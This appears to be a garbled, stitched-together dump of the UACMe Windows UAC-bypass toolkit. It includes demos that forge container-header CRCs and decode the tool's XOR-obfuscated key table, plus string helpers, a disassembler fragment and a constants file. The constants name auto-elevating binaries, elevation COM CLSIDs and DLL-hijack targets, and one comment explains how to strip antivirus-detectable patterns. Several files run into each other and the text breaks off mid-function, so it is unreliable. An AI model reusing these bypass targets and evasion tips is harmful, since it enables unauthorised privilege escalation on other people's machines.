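    if (h->Magic != UACME_CONTAINER_PACKED_UNIT && h->Magic != UACME_CONTAINER_PACKED_DATA &&
        h->Magic != UACME_CONTAINER_PACKED_CODE && h->Magic != UACME_CONTAINER_PACKED_KEYS)
        return 0;
    if (dcu_header_crc(h) != h->HeaderCrc)
        return 0;
    if (h->cbData == 0 || h->cbDeltaSize == 0)
        return 0;
    if (h->cbData > fileSize || h->cbDeltaSize > fileSize)
        return 0;
    if (h->cbDeltaSize > h->cbData)
        return 0;
    if ((uint64_t)sizeof(*h) + h->cbData > fileSize)   /* extra check, not in Naka */
        return 0;
    return 1;
}

/* Build a header with the given fields (zero IV, as Naka uses) and validate it. */
int dcu_check_case(uint32_t magic, uint32_t cbData, uint32_t cbDeltaSize, uint32_t fileSize)
{
    uint8_t iv[DCU_IV_MAX_BLOCK_LENGTH] = {0};
    dcu_header h;
    dcu_build_header(&h, magic, cbData, cbDeltaSize, iv);
    return dcu_validate(&h, fileSize);
}

/* Edit a field, watch the stale CRC reject it, then repair the CRC the way any
 * attacker can. Returns 1 when the edited header is accepted again. */
int dcu_forge_demo(void)
{
    uint8_t iv[DCU_IV_MAX_BLOCK_LENGTH] = {0};
    dcu_header h;
    dcu_build_header(&h, UACME_CONTAINER_PACKED_UNIT, 4096, 3000, iv);
    h.cbDeltaSize = 3500;                 /* edit without touching HeaderCrc */
    if (dcu_validate(&h, 4128))           /* must be rejected: CRC mismatch */
        return 0;
    h.HeaderCrc = dcu_header_crc(&h);     /* recompute; no secret is needed */
    return dcu_validate(&h, 4128);
}

int main(void)
{
    printf("crc32(\"123456789\") = 0x%08X\n", (unsigned)crc32_ieee(0, "123456789", 9));
    printf("constructed header valid: %d\n", dcu_check_case(UACME_CONTAINER_PACKED_UNIT, 4096, 3000, 4128));
    printf("forged header accepted after CRC fix-up: %d\n", dcu_forge_demo());
    return 0;
}
```

The sizes in the demo are constructed (4096 bytes of ciphertext, a 3000-byte delta, a 4128-byte file); the last check in dcu_validate is the one DecompressContainerUnit needs in addition to the header checks, since cbData is otherwise only bounded by the file size, not by what remains after the header.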
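The secrets table EncodeBuffer produces, as an added example rather than project code: a portable reimplementation of the XOR-with-rotating-key routine, the DCK_HEADER layout, and a consumer side (decode the table, then look up a unit's key by its IDR_* id). The consumer side is an assumption about how Akagi uses secrets64.bin/secrets32.bin, since that loader is not on this page. keystream_byte makes the property a practitioner should note visible: _rotl has period 32, so the keystream is a fixed 32-byte pattern independent of the data and the table is recoverable by anyone who knows the constant 'naka'. The table contents are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define UACME_KEY_SIZE 32
#define AKAGI_XOR_KEY 0x6E616B61u   /* MSVC multi-character constant 'naka' */

/* Mirror of Naka's DCK_HEADER: one 36-byte entry per unit in secrets*.bin. */
typedef struct dck_header {
    uint32_t Id;                    /* resource id (IDR_*) of the unit this key belongs to */
    uint8_t  Data[UACME_KEY_SIZE];  /* the 32-byte key blob from the unit's .key file */
} dck_header;

static uint32_t rotl32(uint32_t v, unsigned n)
{
    n &= 31;
    return n ? (v << n) | (v >> (32 - n)) : v;
}

/* Keystream byte i is the low byte of the key rotated left i times; the
 * rotation has period 32, so the keystream repeats every 32 bytes. */
uint8_t keystream_byte(size_t i)
{
    return (uint8_t)rotl32(AKAGI_XOR_KEY, (unsigned)(i % 32));
}

/* Portable equivalent of EncodeBuffer. XOR is its own inverse, so the same
 * call encodes and decodes. */
void encode_buffer(void *buffer, size_t size)
{
    uint8_t *p = (uint8_t *)buffer;
    uint32_t k = AKAGI_XOR_KEY;
    for (size_t i = 0; i < size; i++) {
        p[i] ^= (uint8_t)k;     /* Naka's *ptr ^= k keeps only the low byte */
        k = rotl32(k, 1);
    }
}

/* Consumer side (assumed): decode a table read from secrets*.bin in place;
 * count is the file size divided by sizeof(dck_header). */
void secrets_decode(dck_header *table, size_t count)
{
    encode_buffer(table, count * sizeof(dck_header));
}

const uint8_t *secrets_find(const dck_header *table, size_t count, uint32_t id)
{
    for (size_t i = 0; i < count; i++)
        if (table[i].Id == id)
            return table[i].Data;
    return NULL;
}

/* Constructed two-entry table (ids from the IDR_* list, made-up key bytes):
 * encode it as Naka would write it, decode it as a consumer would, and check
 * both that the bytes changed on disk and that the lookup works afterwards. */
int secrets_roundtrip_demo(void)
{
    dck_header table[2];
    uint8_t plain[2 * sizeof(dck_header)];

    memset(table, 0, sizeof(table));
    table[0].Id = 103;                              /* IDR_AKATSUKI64 */
    table[1].Id = 100;                              /* IDR_FUBUKI64 */
    for (int i = 0; i < UACME_KEY_SIZE; i++) {
        table[0].Data[i] = (uint8_t)i;
        table[1].Data[i] = (uint8_t)(0xA0 + i);
    }
    memcpy(plain, table, sizeof(plain));

    encode_buffer(table, sizeof(table));            /* what lands in secrets64.bin */
    if (memcmp(plain, table, sizeof(plain)) == 0)
        return 0;                                   /* encoding changed nothing */

    secrets_decode(table, 2);
    if (memcmp(plain, table, sizeof(plain)) != 0)
        return 0;                                   /* round trip failed */

    const uint8_t *k = secrets_find(table, 2, 100);
    return k != NULL && k[0] == 0xA0 && secrets_find(table, 2, 999) == NULL;
}

int main(void)
{
    printf("keystream[0..3] = %02X %02X %02X %02X, keystream[32] = %02X\n",
           keystream_byte(0), keystream_byte(1), keystream_byte(2), keystream_byte(3),
           keystream_byte(32));
    printf("secrets round trip ok: %d\n", secrets_roundtrip_demo());
    return 0;
}
```

Because the keystream does not depend on the plaintext, recovering a secrets file needs only the 32-byte pattern; the .key blobs inside are the SHA256 values that CreateContainerPackedUnit writes, which are in turn derived from the packed units.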
================================================
FILE: Source/Shared/_filename.c
================================================
#include #include "minirtl.h"

char *_filename_a(const char *f)
{
    char *p = (char *)f;

    if (f == 0)
        return 0;

    while (*f != (char)0) {
        if (*f == '\\')
            p = (char *)f + 1;
        f++;
    }
    return p;
}

wchar_t *_filename_w(const wchar_t *f)
{
    wchar_t *p = (wchar_t *)f;

    if (f == 0)
        return 0;

    while (*f != (wchar_t)0) {
        if (*f == (wchar_t)'\\')
            p = (wchar_t *)f + 1;
        f++;
    }
    return p;
}

char *_fileext_a(const char *f)
{
    char *p = 0;

    if (f == 0)
        return 0;

    while (*f != (char)0) {
        if (*f == '.')
            p = (char *)f;
        f++;
    }

    if (p == 0)
        p = (char *)f;
    return p;
}

wchar_t *_fileext_w(const wchar_t *f)
{
    wchar_t *p = 0;

    if (f == 0)
        return 0;

    while (*f != (wchar_t)0) {
        if (*f == (wchar_t)'.')
            p = (wchar_t *)f;
        f++;
    }

    if (p == 0)
        p = (wchar_t *)f;
    return p;
}

char *_filename_noext_a(char *dest, const char *f)
{
    char *p, *l, *dot;

    if ((f == 0) || (dest == 0))
        return 0;

    p = _filename_a(f);
    if (p == 0)
        return 0;

    dot = _strend_a(p);
    if (dot == 0)
        return 0;

    l = p;
    while (*l != (char)0) {
        if (*l == '.')
            dot = l;
        l++;
    }

    while (p0) );
    return (int)(c1 - c2);
}

int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
{
    wchar_t c1, c2;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;
    if (cchars == 0)
        return 0;

    do {
        c1 = *s1;
        c2 = *s2;
        s1++;
        s2++;
        cchars--;
    } while ((c1 != 0) && (c1 == c2) && (cchars > 0));

    return (int)(c1 - c2);
}

================================================
FILE: Source/Shared/_strncmpi.c
================================================
#include "rtltypes.h"

int _strncmpi_a(const char *s1, const char *s2, size_t cchars)
{
    char c1, c2;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;
    if (cchars == 0)
        return 0;

    do {
        c1 = locase_a(*s1);
        c2 = locase_a(*s2);
        s1++;
        s2++;
        cchars--;
    } while ((c1 != 0) && (c1 == c2) && (cchars > 0));

    return (int)(c1 - c2);
}

int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars)
{
    wchar_t c1, c2;

    if (s1 == s2)
        return 0;
    if (s1 == 0)
        return -1;
    if (s2 == 0)
        return 1;
    if (cchars == 0)
        return 0;

    do {
        c1 = locase_w(*s1);
        c2 = locase_w(*s2);
        s1++;
        s2++;
        cchars--;
    } while ((c1 != 0) && (c1 == c2) && (cchars > 0));

    return (int)(c1 - c2);
}

================================================
FILE: Source/Shared/_strncpy.c
================================================
#include "rtltypes.h"

char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc)
{
    char *p;

    if ((dest == 0) || (src == 0) || (ccdest == 0))
        return dest;

    ccdest--;
    p = dest;
    while ((*src != 0) && (ccdest > 0) && (ccsrc > 0)) {
        *p = *src;
        p++;
        src++;
        ccdest--;
        ccsrc--;
    }
    *p = 0;
    return dest;
}

wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc)
{
    wchar_t *p;

    if ((dest == 0) || (src == 0) || (ccdest == 0))
        return dest;

    ccdest--;
    p = dest;
    while ((*src != 0) && (ccdest > 0) && (ccsrc > 0)) {
        *p = *src;
        p++;
        src++;
        ccdest--;
        ccsrc--;
    }
    *p = 0;
    return dest;
}

================================================
FILE: Source/Shared/_strstri.c
================================================
#include "rtltypes.h"

char *_strstri_a(const char *s, const char *sub_s)
{
    char c0, c1, c2, *tmps, *tmpsub;

    if (s == sub_s)
        return (char *)s;
    if (s == 0)
        return 0;
    if (sub_s == 0)
        return 0;

    c0 = locase_a(*sub_s);
    while (c0 != 0) {

        while (*s != 0) {
            c2 = locase_a(*s);
            if (c2 == c0)
                break;
            s++;
        }
        if (*s == 0)
            return 0;

        tmps = (char *)s;
        tmpsub = (char *)sub_s;
        do {
            c1 = locase_a(*tmps);
            c2 = locase_a(*tmpsub);
            tmps++;
            tmpsub++;
        } while ((c1 == c2) && (c2 != 0));

        if (c2 == 0)
            return (char *)s;
        s++;
    }
    return 0;
}

wchar_t *_strstri_w(const wchar_t *s, const wchar_t *sub_s)
{
    wchar_t c0, c1, c2, *tmps, *tmpsub;

    if (s == sub_s)
        return (wchar_t *)s;
    if (s == 0)
        return 0;
    if (sub_s == 0)
        return 0;

    c0 = locase_w(*sub_s);
    while (c0 != 0) {

        while (*s != 0) {
            c2 = locase_w(*s);
            if (c2 == c0)
                break;
            s++;
        }
        if (*s == 0)
            return 0;

        tmps = (wchar_t *)s;
        tmpsub = (wchar_t *)sub_s;
        do {
            c1 = locase_w(*tmps);
            c2 = locase_w(*tmpsub);
            tmps++;
            tmpsub++;
        } while ((c1 == c2) && (c2 != 0));

        if (c2 == 0)
            return (wchar_t *)s;
        s++;
    }
    return 0;
}

================================================
FILE: Source/Shared/cmdline.c
================================================
#include

BOOL GetCommandLineParamW(
    IN LPCWSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPWSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
)
{
    ULONG c, plen = 0;
    WCHAR divider;

    if (ParamLen != NULL)
        *ParamLen = 0;

    if (CmdLine == NULL) {
        if ((Buffer != NULL) && (BufferSize > 0))
            *Buffer = 0;
        return FALSE;
    }

    for (c = 0; c <= ParamIndex; c++) {
        plen = 0;

        while (*CmdLine == ' ')
            CmdLine++;

        switch (*CmdLine) {
        case 0:
            goto zero_term_exit;

        case '"':
            CmdLine++;
            divider = '"';
            break;

        default:
            divider = ' ';
        }

        while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
            plen++;
            if (c == ParamIndex)
                if ((plen < BufferSize) && (Buffer != NULL)) {
                    *Buffer = *CmdLine;
                    Buffer++;
                }
            CmdLine++;
        }

        if (*CmdLine != 0)
            CmdLine++;
    }

zero_term_exit:

    if ((Buffer != NULL) && (BufferSize > 0))
        *Buffer = 0;

    if (ParamLen != NULL)
        *ParamLen = plen;

    if (plen < BufferSize)
        return TRUE;
    else
        return FALSE;
}

BOOL GetCommandLineParamA(
    IN LPCSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
)
{
    ULONG c, plen = 0;
    CHAR divider;

    if (CmdLine == NULL)
        return FALSE;

    if (ParamLen != NULL)
        *ParamLen = 0;

    for (c = 0; c <= ParamIndex; c++) {
        plen = 0;

        while (*CmdLine == ' ')
            CmdLine++;

        switch (*CmdLine) {
        case 0:
            goto zero_term_exit;

        case '"':
            CmdLine++;
            divider = '"';
            break;

        default:
            divider = ' ';
        }

        while ((*CmdLine != '"') && (*CmdLine != divider) && (*CmdLine != 0)) {
            plen++;
            if (c == ParamIndex)
                if ((plen < BufferSize) && (Buffer != NULL)) {
                    *Buffer = *CmdLine;
                    Buffer++;
                }
            CmdLine++;
        }

        if (*CmdLine != 0)
            CmdLine++;
    }

zero_term_exit:

    if ((Buffer != NULL) && (BufferSize > 0))
        *Buffer = 0;

    if (ParamLen != NULL)
        *ParamLen = plen;

    if (plen < BufferSize)
        return TRUE;
    else
        return FALSE;
}

char *ExtractFilePathA(const char *FileName, char *FilePath)
{
    char *p = (char *)FileName, *p0 = (char *)FileName;

    if ((FileName == 0) || (FilePath == 0))
        return 0;

    while (*FileName != 0) {
        if (*FileName == '\\')
            p = (char *)FileName + 1;
        FileName++;
    }

    while (p0 < p) {
        *FilePath = *p0;
        FilePath++;
        p0++;
    }

    *FilePath = 0;
    return FilePath;
}

wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath)
{
    wchar_t *p = (wchar_t *)FileName, *p0 = (wchar_t *)FileName;

    if ((FileName == 0) || (FilePath == 0))
        return 0;

    while (*FileName != 0) {
        if (*FileName == '\\')
            p = (wchar_t *)FileName + 1;
        FileName++;
    }

    while (p0 < p) {
        *FilePath = *p0;
        FilePath++;
        p0++;
    }

    *FilePath = 0;
    return FilePath;
}

================================================
FILE: Source/Shared/cmdline.h
================================================
#ifndef _CMDLINEH_
#define _CMDLINEH_

BOOL GetCommandLineParamW(
    IN LPCWSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPWSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
);

BOOL GetCommandLineParamA(
    IN LPCSTR CmdLine,
    IN ULONG ParamIndex,
    OUT LPSTR Buffer,
    IN ULONG BufferSize,
    OUT PULONG ParamLen
);

char *ExtractFilePathA(const char *FileName, char *FilePath);
wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath);

#ifdef UNICODE
#define ExtractFilePath ExtractFilePathW
#define GetCommandLineParam GetCommandLineParamW
#else // ANSI
#define ExtractFilePath ExtractFilePathA
#define GetCommandLineParam GetCommandLineParamA
#endif

#endif /* _CMDLINEH_ */

================================================
FILE: Source/Shared/consts.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2015 - 2025
*
*  TITLE:       CONSTS.H
*
*  VERSION:     3.69
*
*  DATE:        14 Dec 2025
*
*  Global consts definition file.
*
*  If you are looking for unique enough pattern look for values/regions marked as "PYSH".
*  Get rid of these values, or customize them otherwise.
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

#define AKAGI_XOR_KEY 'naka'
#define AKAGI_XOR_KEY2 ' pta'

//"UACMe"
#define ISDB_PROGRAMNAME 6

#define UCM_VERSION_MAJOR 3
#define UCM_VERSION_MINOR 6
#define UCM_VERSION_REVISION 9
#define UCM_VERSION_BUILD 2512

#define SUPRUNPROCESS_TIMEOUT_DEFAULT 12000

//
// A very long list for future use.
//
#define UACME_SHARED_BASE_ID 'sTlA'

//
// Trash end char.
//
#define UCM_TRASH_END_CHAR L'~'

//
// WORD sized id list.
//
#define AKAGI_COMPLETION_EVENT_ID 'ab'
#define AKAGI_SHARED_SECTION_ID 'cd'
#define AKAGI_BDESCRIPTOR_NAME_ID 'ef'
#define FUBUKI_SYNC_MUTEX_ID 'a1'
#define FUBUKI_PCA_SECTION_ID '0f'
#define FUBUKI_PCA_EVENT_ID '1f'

#define FUBUKI_PCA_PAYLOAD_RUN (0x1)
#define FUBUKI_PCA_LOADER_RUN (0x2)
#define FUBUKI_PCA_ALL_RUN (FUBUKI_PCA_PAYLOAD_RUN | FUBUKI_PCA_LOADER_RUN)

//
// Kamikaze consts
//
#define KAMIKAZE_MARKER "https"

#define WF_MSC L"wf.msc"

#define T_DEFAULT_DESKTOP L"WinSta0\\Default"
#define T_WINDOWS_CURRENT_VERSION L"MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"

#pragma region PYSH
#define T_DISPLAY_CALIBRATION L"Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration"
#define T_PCA_STORE L"Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store"
#define T_APPCOMPAT_LAYERS L"Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers"
#define T_PCA_PERSISTED L"Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Persisted"
#define T_APP_ASSOC_TOASTS L"Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationAssociationToasts"
#define T_HTMLHELP_AUTHOR L"Software\\Microsoft\\HtmlHelp Author"
#define T_WEBVIEW_POLICY L"Software\\Policies\\Microsoft\\Edge\\WebView2\\BrowserExecutableFolder"
#define T_CURVER L"CurVer"
#define T_MSSETTINGS L"ms-settings"
#define T_MSWINDOWSSTORE L"ms-windows-store"
#define T_QUICKASSIST L"ms-quick-assist:"
#define T_CLASSESFOLDER L"Folder"
#define T_LAUNCHERSYSTEMSETTINGS L"Launcher.SystemSettings"
#define T_LOCATION L"Location"
#define ELLOCNAK_MSU L"update.msu"
#define RUN_CMD_COMMAND L" /c start "
#define T_APPXSVC L"AppXSvc"
#define T_PCASVC L"PcaSvc"
#pragma endregion

#define T_SOFTWARE_CLASSES L"Software\\Classes"
#define T_SHELL_OPEN L"\\shell\\open"
#define T_SHELL_COMMAND L"command"
#define T_URL_PROTOCOL L"URL Protocol"
#define T_URL_MS_WIN_STORE L"URL:ms-windows-store"
#define T_SDDL_ALL_FOR_EVERYONE L"D:(A;;GA;;;WD)"
#define T_SDDL_EVERYONE_FULL_ACCESS L"D:PAI(A;OICI;FA;;;WD)"
#define T_WINDIR L"windir"
#define T_SYSTEMROOT L"systemroot"
#define T_WINDOWSMEDIAPLAYER L"Windows Media Player"
#define T_DELEGATEEXECUTE L"DelegateExecute"
#define T_PROTO_HTTP L"http"

//
// Unit names and entrypoints
//
#pragma region PYSH
#define KAMIKAZE_MSC L"kmkze.msc"
#define KAMIKAZE_LAUNCHER L"readme.html"
#define FUBUKI_EXT_ENTRYPOINT "MpManagerOpen"
#define FUBUKI_WND_HOOKPROC "MpHandleClose"
#define FUBUKI_DEFAULT_ENTRYPOINT "MpScanStart"
#define FUBUKI_ENTRYPOINT_UIACCESS2 "MpScanControl"
#define FUBUKI_ENTRYPOINT_UIACCESS3 "MpUpdateEngine"
#define FUBUKI_ENTRYPOINT_SXS "MpThreatOpen"
#define FUBUKI_ENTRYPOINT_PCAEXE "MpManagerStatusQuery"
#define FUBUKI_ENTRYPOINT_PCADLL "MpManagerStatusQueryEx"
#define FUBUKI_ENTRYPOINT_QASSIST "MpThreatEnumerate"
#define AKATSUKI_ENTRYPOINT_EXE "Wow64LogMessageArgList"
#pragma endregion

//
// Windows dll names
//
#define APISET_KERNEL32LEGACY L"api-ms-win-core-kernel32-legacy-l1.DLL"
#define ATL_DLL L"ATL.dll"
#define BLUETOOTHDIAGNOSTICUTIL_DLL L"BluetoothDiagnosticUtil.dll"
#define COMCTL32_DLL L"comctl32.dll"
#define DISMCORE_DLL L"dismcore.dll"
#define DUSER_DLL L"duser.dll"
#define EMBEDDEDBROWSERWEBVIEW_DLL L"EmbeddedBrowserWebView.dll"
#define GDIPLUS_DLL L"GdiPlus.dll"
#define ISCSIEXE_DLL L"iscsiexe.dll"
#define OSKSUPPORT_DLL L"OskSupport.dll"
#define PCADM_DLL L"pcadm.dll"
#define PERFORMANCETRACEHANDLER_DLL L"PerformanceTraceHandler.dll"
#define SHELL32_DLL L"shell32.dll"
#define WINMM_DLL L"winmm.dll"
#define WOW64LOG_DLL L"wow64log.dll"

//
// Native image cache targets
//
#define ASSEMBLY_MMCEX L"MMCEx"
#define MMCEX_NI_DLL L"MMCEx.ni.dll"
#define MMCEX_NI_DLL_AUX L"MMCEx.ni.dll.aux"
#define ASSEMBLY_ACCESSIBILITY L"Accessibility"

//
// Windows executables
//
#define CMD_EXE L"cmd.exe"
#define CLIPUP_EXE L"Clipup.exe"
#define COMPUTERDEFAULTS_EXE L"computerdefaults.exe"
#define CONSENT_EXE L"consent.exe"
#define DCCW_EXE L"dccw.exe"
#define EVENTVWR_EXE L"eventvwr.exe"
#define EXPLORER_EXE L"explorer.exe"
#define FODHELPER_EXE L"fodhelper.exe"
#define ISCSICPL_EXE L"iscsicpl.exe"
#define MMC_EXE L"mmc.exe"
#define MSCONFIG_EXE L"msconfig.exe"
#define MSCHEDEXE_EXE L"mschedexe.exe"
#define MSDT_EXE L"msdt.exe"
#define OSK_EXE L"osk.exe"
#define PKGMGR_EXE L"pkgmgr.exe"
#define QUICKASSIST_EXE L"QuickAssist.exe"
#define SDCLT_EXE L"sdclt.exe"
#define SLUI_EXE L"slui.exe"
#define TASKHOSTW_EXE L"taskhostw.exe"
#define WINSAT_EXE L"winsat.exe"
#define WINVER_EXE L"winver.exe"
#define WSRESET_EXE L"WSReset.exe"
#define WUSA_EXE L"wusa.exe"

//
// Windows subdirectories
//

// system32 only name
#define SYSTEM32_DIR_NAME L"system32"

// system32 with both sides slash
#define SYSTEM32_DIR L"\\system32\\"

// syswow64 with both sides slash
#define SYSWOW64_DIR L"\\syswow64\\"

#define NET2_DIR L"v2.0.50727"
#define NET4_DIR L"v4.0.30319"
#define MSNETFRAMEWORK_DIR L"Microsoft.NET\\Framework"
#define MMCEX_DIR L"\\MMCEx"
#define WBEM_DIR L"wbem\\"
#define WEBVIEW_DIR L"EBWebView"

//
// Shell Verbs
//
#define RUNAS_VERB L"runas"

//
// Windows MMC snap-ins
//
#define EVENTVWR_MSC L"eventvwr.msc"
#define WMIMGMT_MSC L"WmiMgmt.msc"

//
// Units specific values
//
#define MYSTERIOUSCUTETHING L"pe386" //PYSH
#define ABSOLUTEWIN L"lzx32" //PYSH
#define THEOLDNEWTHING L"hui32" //PYSH

//
// SxS
//
#define LOCAL_SXS L".local" //PYSH
#define FAKE_LOCAL_SXS L".@" //PYSH
#define COMCTL32_SXS L"microsoft.windows.common-controls"
#define GDIPLUS_SXS L"microsoft.windows.gdiplus"

//
// System consts
//
#define T_VOLATILE_ENV L"Volatile Environment"
#define T_REGISTRY_PREP L"\\REGISTRY\\" //end slash included

//
// COR profiler
//
#define COR_PROFILER L"COR_PROFILER"
#define COR_PROFILER_PATH L"COR_PROFILER_PATH"
#define COR_ENABLE_PROFILING L"COR_ENABLE_PROFILING"

//
// WebView environment variable
//
#define WEBVIEW2_FOLRDER_VAR L"WEBVIEW2_BROWSER_EXECUTABLE_FOLDER"

//
// DCCW calibrator
//
#define T_CALIBRATOR_VALUE L"DisplayCalibrator" //PYSH

//
// COM related trash
//
#define T_REG_SOFTWARECLASSESCLSID L"Software\\Classes\\CLSID\\"
#define T_REG_INPROCSERVER32 L"\\InProcServer32"
#define T_REG_SHELLFOLDER L"\\ShellFolder"
#define T_THREADINGMODEL L"ThreadingModel"
#define T_APARTMENT L"Apartment"

//
// COM objects elevation
//
#pragma region PYSH
#define T_CLSID_ColorDataProxy L"{D2E7041B-2927-42fb-8E9F-7CE93B6DC937}"
#define T_CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define T_CLSID_FwCplLua L"{752438CB-E941-433F-BCB4-8B7D2329F0C8}"
#define T_CLSID_FileOperation L"{3AD05575-8857-4850-9277-11B85BDB8E09}"
#define T_CLSID_ShellSecurityEditor L"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}"
#define T_CLSID_EditionUpgradeManager L"{17CCA47D-DAE5-4E4A-AC42-CC54E28F334A}"
#define T_CLSID_IEAAddonInstaller L"{BDB57FF2-79B9-4205-9447-F5FE85F37312}"
#define T_CLSID_SecurityCenter L"{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}"
#define T_CLSID_VFServer L"{A6BFEA43-501F-456F-A845-983D3AD7B8F0}"
#define T_CLSID_VFServerDiagCpl L"{12C21EA7-2EB8-4B55-9249-AC243DA8C666}"
#define T_CLSID_DiagnosticProfile L"{D0B7E02C-E1A3-11DC-81FF-001185AE5E76}"
#pragma endregion

//
// Moniker(s)
// #define T_ELEVATION_MONIKER_ADMIN L"Elevation:Administrator!new:" // // RPC interface UUID // #define APPINFO_RPC TEXT("201ef99a-7fa0-444c-9399-19ba84f12a1a") #define PCASVC_RPC TEXT("0767a036-0d22-48aa-ba69-b619480f38cb") ================================================ FILE: Source/Shared/hde/hde64.c ================================================ /* * Hacker Disassembler Engine 64 C * Copyright (c) 2008-2009, Vyacheslav Patkov. * All rights reserved. * */ #include "hde64.h" #include "table64.h" #pragma warning(push) #pragma warning(disable:4701) #pragma warning(disable:4706) unsigned int hde64_disasm(const void *code, hde64s *hs) { uint8_t x, c = 0, *p = (uint8_t *)code, cflags, opcode, pref = 0; uint8_t *ht = hde64_table, m_mod, m_reg, m_rm, disp_size = 0; uint8_t op64 = 0; // Avoid using memset to reduce the footprint. #ifndef _MSC_VER memset((LPBYTE)hs, 0, sizeof(hde64s)); #else __stosb((LPBYTE)hs, 0, sizeof(hde64s)); #endif for (x = 16; x; x--) switch (c = *p++) { case 0xf3: hs->p_rep = c; pref |= PRE_F3; break; case 0xf2: hs->p_rep = c; pref |= PRE_F2; break; case 0xf0: hs->p_lock = c; pref |= PRE_LOCK; break; case 0x26: case 0x2e: case 0x36: case 0x3e: case 0x64: case 0x65: hs->p_seg = c; pref |= PRE_SEG; break; case 0x66: hs->p_66 = c; pref |= PRE_66; break; case 0x67: hs->p_67 = c; pref |= PRE_67; break; default: goto pref_done; } pref_done: hs->flags = (uint32_t)pref << 23; if (!pref) pref |= PRE_NONE; if ((c & 0xf0) == 0x40) { hs->flags |= F_PREFIX_REX; if ((hs->rex_w = (c & 0xf) >> 3) && (*p & 0xf8) == 0xb8) op64++; hs->rex_r = (c & 7) >> 2; hs->rex_x = (c & 3) >> 1; hs->rex_b = c & 1; if (((c = *p++) & 0xf0) == 0x40) { opcode = c; goto error_opcode; } } if ((hs->opcode = c) == 0x0f) { hs->opcode2 = c = *p++; ht += DELTA_OPCODES; } else if (c >= 0xa0 && c <= 0xa3) { op64++; if (pref & PRE_67) pref |= PRE_66; else pref &= ~PRE_66; } opcode = c; cflags = ht[ht[opcode / 4] + (opcode % 4)]; if (cflags == C_ERROR) { error_opcode: hs->flags |= F_ERROR | 
F_ERROR_OPCODE; cflags = 0; if ((opcode & -3) == 0x24) cflags++; } x = 0; if (cflags & C_GROUP) { uint16_t t; t = *(uint16_t *)(ht + (cflags & 0x7f)); cflags = (uint8_t)t; x = (uint8_t)(t >> 8); } if (hs->opcode2) { ht = hde64_table + DELTA_PREFIXES; if (ht[ht[opcode / 4] + (opcode % 4)] & pref) hs->flags |= F_ERROR | F_ERROR_OPCODE; } if (cflags & C_MODRM) { hs->flags |= F_MODRM; hs->modrm = c = *p++; hs->modrm_mod = m_mod = c >> 6; hs->modrm_rm = m_rm = c & 7; hs->modrm_reg = m_reg = (c & 0x3f) >> 3; if (x && ((x << m_reg) & 0x80)) hs->flags |= F_ERROR | F_ERROR_OPCODE; if (!hs->opcode2 && opcode >= 0xd9 && opcode <= 0xdf) { uint8_t t = opcode - 0xd9; if (m_mod == 3) { ht = hde64_table + DELTA_FPU_MODRM + t*8; t = ht[m_reg] << m_rm; } else { ht = hde64_table + DELTA_FPU_REG; t = ht[t] << m_reg; } if (t & 0x80) hs->flags |= F_ERROR | F_ERROR_OPCODE; } if (pref & PRE_LOCK) { if (m_mod == 3) { hs->flags |= F_ERROR | F_ERROR_LOCK; } else { uint8_t *table_end, op = opcode; if (hs->opcode2) { ht = hde64_table + DELTA_OP2_LOCK_OK; table_end = ht + DELTA_OP_ONLY_MEM - DELTA_OP2_LOCK_OK; //-V594 } else { ht = hde64_table + DELTA_OP_LOCK_OK; table_end = ht + DELTA_OP2_LOCK_OK - DELTA_OP_LOCK_OK; //-V594 op &= -2; } for (; ht != table_end; ht++) if (*ht++ == op) { if (!((*ht << m_reg) & 0x80)) goto no_lock_error; else break; } hs->flags |= F_ERROR | F_ERROR_LOCK; no_lock_error: ; } } if (hs->opcode2) { switch (opcode) { case 0x20: case 0x22: m_mod = 3; if (m_reg > 4 || m_reg == 1) goto error_operand; else goto no_error_operand; case 0x21: case 0x23: m_mod = 3; if (m_reg == 4 || m_reg == 5) goto error_operand; else goto no_error_operand; } } else { switch (opcode) { case 0x8c: if (m_reg > 5) goto error_operand; else goto no_error_operand; case 0x8e: if (m_reg == 1 || m_reg > 5) goto error_operand; else goto no_error_operand; } } if (m_mod == 3) { uint8_t *table_end; if (hs->opcode2) { ht = hde64_table + DELTA_OP2_ONLY_MEM; table_end = ht + sizeof(hde64_table) - 
